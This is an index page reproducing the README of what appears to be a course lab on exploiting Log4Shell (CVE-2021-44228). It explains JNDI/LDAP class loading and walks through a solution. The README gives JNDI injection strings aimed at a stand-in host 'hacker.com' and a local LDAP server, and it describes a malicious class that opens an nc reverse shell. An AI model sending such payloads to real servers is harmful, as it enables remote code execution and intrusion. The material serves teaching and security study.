Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/algomaster99/fep3370-exploit-development-log4shell
https://github.com/algomaster99/fep3370-exploit-development-log4shell
Last synced: 29 days ago
JSON representation
- Host: GitHub
- URL: https://github.com/algomaster99/fep3370-exploit-development-log4shell
- Owner: algomaster99
- Created: 2024-10-19T16:37:19.000Z (3 months ago)
- Default Branch: main
- Last Pushed: 2024-11-05T09:26:54.000Z (2 months ago)
- Last Synced: 2024-11-05T10:31:08.657Z (2 months ago)
- Language: Java
- Size: 1.45 MB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
Exploit the vulnerable server by sending a value in the `User-Agent` header.
### Vulnerability
The vulnerable server is a Java application that is vulnerable to LDAP injection via log4j library.
The overview of the vulnerability is in the figure below:![Vulnerability overview](./Log4J%20vulnerability.jpg)
#### How does the exploit work?
The above figure gives an overview of a `Log4Shell` attack.
The attacker, first, creates a malicious class file `Exploit.class` and hosts it on a server controlled by them.
The malicious class file is hosted on the HTTP server and the LDAP server stores a reference to the HTTP server via an HTTP URL.
Then, the attacker sends a crafted request with expression `${jndi:ldap://hacker.com/o=referenceToExploit}` in the header.
JNDI stands for Java Naming and Directory Interface and it allows one to look up resources in a directory.
The LDAP server with domain name `hacker.com` is used to store the reference to the HTTP server.
`http://hacker.com/Exploit.class` is queried and it returns the malicious class file.
The enterprise application is vulnerable to this as it is using `Log4j`.
`Log4j` logs the value in the User-Agent header.
This is normally done to record the telemetry data of the application.
However, in this case, the expression is interpreted and the \ac{JVM} running loads `Exploit.class`.
Finally, the malicious class can execute arbitrary offensive commands, e.g. to steal private data or perform ransomware attacks.> “NVD - CVE-2021-44228.” [Online]. Available: https://nvd.nist.
gov/vuln/detail/CVE-2021-44228
> https://www.sonatype.com/blog/why-did-log4shell-set-the-internet-on-fire#### Why does it exist?
```
ClassLoader.defineClass1$() (7)
// [...] internal java classes
VersionHelper.loadClass$() (6)
DirectoryManager.getObjectInstance$() (5)
LdapCtx.c_lookup$() (4)
JndiLookup.lookup$() (3)
// [...] internal Log4j classes
Logger.log$() (2)
Main.main$() (1)
```We explain this in more detail using the above listing.
It begins with the (1) main method of the application that attempts to (2) log a message, a malicious input in this case.
The log message is processed by the internal `Log4j` classes that invoke the (3) lookup method inside the `Log4j` dependency.
This lookup method is delegated to the (4) `LdapCtx` class which is part of the Java standard library and it queries for the entry `o=reference` in the LDAP server.
This query triggers class loading of the malicious class `xExportObject` by invoking (5) `DirectoryManager.getObjectInstance()`.
The method reads two attributes of the LDAP entry `o=reference` - `javaCodebase` and `javaFactory`, then (6) `VersionHelper.loadClass()` initiates class loading~\cite{seligman_schema_1999}.
At this point, the class is integrated into the runtime by the (7) Classloader and is ready for execution.
Finally, the malicious class can execute arbitrary offensive commands, e.g. to steal private data or perform ransomware attacks.> Aman Sharma, Martin Wittlinger, Benoit Baudry, and Martin Monperrus. 2024. SBOM.EXE: Countering Dynamic Code Injection Based on Software Bill of Materials in Java. https://doi.org/10.48550/arXiv.2407.00246 arXiv:2407.00246 [cs]
### Start challenge
We start the challenge by creating a vulnerable server that contains the Log4j library.
It simply logs the value of the `User-Agent` header.```bash
cd challenge
docker compose up
```### Solution
We create a malicious class file `Exploit.class` and host it on a HTTP server.
The malicious class file contains a `nc` command that spawns a reverse shell.
We then create a LDAP server that stores a reference to the HTTP server.```bash
cd solution
docker compose up
```In two different terminals, run the following commands:
1. ```bash
./netcat-listener.sh
```
The listener is used to listen for incoming connections.
This will start a netcat listener on port 4444.
2. ```bash
./exploit.sh
```
This sends a request to the vulnerable server with the `User-Agent` header set to the value `${jndi:ldap://172.17.0.1:1389/Exploit}`.
This will trigger the Log4j vulnerability.
The `log.info` statement will process the `jndi` expression and query the LDAP server.
The LDAP server will then query the HTTP server and return the malicious class file.
The vulnerable server will then attempt to load the malicious class file and execute the `nc` command.
Finally, the listener will obtain a reverse shell.### Flag
![Flag](./flag.png)